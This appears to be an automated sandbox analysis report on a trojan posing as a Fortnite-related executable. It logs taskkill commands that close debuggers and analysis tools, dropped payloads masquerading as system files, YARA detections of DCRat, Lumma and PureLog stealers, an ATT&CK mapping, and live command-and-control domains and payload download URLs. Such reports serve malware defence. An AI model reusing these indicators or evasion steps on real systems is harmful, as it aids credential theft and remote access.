Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x64dbg" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ida" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T

Source: C:\Windows\Speech\kdmapper.exe

Code function: 52_2_00EDF654 cpuid

52_2_00EDF654

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: GetLocaleInfoEx,FormatMessageA,	0_2_00007FF60C48267C
Source: C:\Windows\Speech\imxyvi.exe	Code function: GetLocaleInfoEx,FormatMessageA,	28_2_00007FF6A953A33C
Source: C:\Windows\Speech\kdmapper.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	52_2_00EDAF0F

Source: C:\Windows\Speech\physmeme.exe	Queries volume information: C:\Windows\Speech\physmeme.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Speech\rtcore64.exe	Queries volume information: C:\Windows\Speech\rtcore64.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe

Code function: 0_2_00007FF60C483944 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF60C483944

Source: C:\Windows\Speech\kdmapper.exe

Code function: 52_2_00ECB146 GetVersionExW,

52_2_00ECB146

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: Amcache.hve.46.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.46.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.46.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.46.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 000000A1.00000002.1813420320.0000000012AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 7484, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 52.3.kdmapper.exe.63c66cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.3.kdmapper.exe.63c66cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.3.kdmapper.exe.4c616cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 161.0.msedge.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 000000A1.00000000.1655201079.00000000005F2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000003.1471509432.0000000006378000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000003.1474597690.0000000004C13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\winlogon.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 52.3.kdmapper.exe.63c66cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.3.kdmapper.exe.63c66cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.3.kdmapper.exe.4c616cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 161.0.msedge.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\winlogon.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 000000A1.00000002.1813420320.0000000012AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 7484, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 52.3.kdmapper.exe.63c66cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.3.kdmapper.exe.63c66cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.3.kdmapper.exe.4c616cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 161.0.msedge.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 000000A1.00000000.1655201079.00000000005F2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000003.1471509432.0000000006378000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000003.1474597690.0000000004C13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\winlogon.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 52.3.kdmapper.exe.63c66cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.3.kdmapper.exe.63c66cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.3.kdmapper.exe.4c616cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 161.0.msedge.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\winlogon.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	111 Disable or Modify Tools	11 Input Capture	1 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Windows Service	111 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Windows Service	411 Process Injection	4 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	11 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Service Execution	1 Scheduled Task/Job	1 Scheduled Task/Job	14 Software Packing	NTDS	331 Security Software Discovery	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	131 Masquerading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	411 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
UY9hUZn4CQ.exe	34%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\winlogon.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\oLoCRyrD.log	100%	Avira	TR/AVI.Agent.updqb
C:\Windows\Speech\rtcore64.exe	100%	Avira	HEUR/AGEN.1352236
C:\Edge\L6lFlVnd0szYUYb26bZc.vbe	100%	Avira	VBS/Runner.VPG
C:\Windows\Speech\kdmapper.exe	100%	Avira	VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\LZthEGCsKS.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\QGjYUwSA.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Edge\msedge.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\winlogon.exe	100%	Joe Sandbox ML
C:\Windows\Speech\rtcore64.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\XEXXxLMp.log	100%	Joe Sandbox ML
C:\Windows\Speech\kdmapper.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\MQshNARH.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\QGjYUwSA.log	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\msvcp110.dll	100%	Joe Sandbox ML
C:\Edge\msedge.exe	100%	Joe Sandbox ML
C:\Edge\msedge.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\winlogon.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\ITDiARjW.log	29%	ReversingLabs
C:\Users\user\Desktop\MQshNARH.log	8%	ReversingLabs
C:\Users\user\Desktop\QGjYUwSA.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\XEXXxLMp.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\oLoCRyrD.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Speech\imxyvi.exe	71%	ReversingLabs	Win64.Trojan.Generic
C:\Windows\Speech\kdmapper.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Speech\physmeme.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.LummaStealer

Name	IP	Active	Malicious
offeviablwke.site	172.67.197.40	true	true
steamcommunity.com	104.102.49.254	true	false
file.garden	188.114.97.3	true	false
underlinemdsj.site	104.21.1.169	true	true
explorationmsn.store	188.114.96.3	true	true
fossillargeiw.shop	unknown	unknown	true
possiwreeste.site	unknown	unknown	true
commandejorsk.site	unknown	unknown	true
strappystyio.shop	unknown	unknown	true
famikyjdiag.site	unknown	unknown	true
writekdmsnu.site	unknown	unknown	true
agentyanlark.site	unknown	unknown	true
tiddymarktwo.shop	unknown	unknown	true
coursedonnyre.shop	unknown	unknown	true
surveriysiop.shop	unknown	unknown	true
delaylacedmn.site	unknown	unknown	true
bellykmrebk.site	unknown	unknown	true
captainynfanw.shop	unknown	unknown	true
tearrybyiwo.shop	unknown	unknown	true
zelensky.top	unknown	unknown	true
appleboltelwk.shop	unknown	unknown	true
tendencerangej.shop	unknown	unknown	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
commandejorsk.site	true
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin	false
https://offeviablwke.site/api	true
agentyanlark.site	true
underlinemdsj.site	true
possiwreeste.site	true
https://steamcommunity.com/profiles/76561199724331900	false
https://file.garden/ZmE_ziOgiFXI9Y48/build.bin	false
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin	false
bellykmrebk.site	true
https://underlinemdsj.site/api	true

URLs from Memory and Binaries

Name	Source	Malicious
https://player.vimeo.com	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://famikyjdiag.site/l1	aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmp	false
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://steamcommunity.com/?subsection=broadcasts	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://famikyjdiag.site/d1	aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmp	false
https://bellykmrebk.site/apii	aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://store.steampowered.com/subscriber_agreement/	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://www.gstatic.cn/recaptcha/	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
http://www.valvesoftware.com/legal.htm	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://file.garden/ZmE_ziOgiFXI9Y48/build.bin6	curl.exe, 00000037.00000003.1493561295.000002E955E79000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.1497355891.000002E955E7A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1493649612.000002E955E7A000.00000004.00000020.00020000.00000000.sdmp	false
https://www.youtube.com	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin9A	curl.exe, 0000001F.00000003.1395366258.000001EC889D9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395437445.000001EC889DA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000002.1397126681.000001EC889DA000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.com	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://famikyjdiag.site/	aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://file.garden/ZmE_ziOgiFXI9Y48/build.bin--outputC:	curl.exe, 00000037.00000002.1497161944.000002E955E40000.00000004.00000020.00020000.00000000.sdmp	false
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://commandejorsk.site/L1_	aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a	aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://commandejorsk.site/apis	aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://s.ytimg.com;	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	msedge.exe, 000000A1.00000002.1763831383.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:	curl.exe, 0000001F.00000002.1397098489.000001EC889A0000.00000004.00000020.00020000.00000000.sdmp	false
https://steam.tv/	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://underlinemdsj.site/	aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://bellykmrebk.site/api2	aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://store.steampowered.com/points/shop/	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://bellykmrebk.site/l1	aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://bellykmrebk.site/api$	aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bins	curl.exe, 0000001F.00000002.1397098489.000001EC889A8000.00000004.00000020.00020000.00000000.sdmp	false
https://sketchfab.com	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://lv.queniujq.cn	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
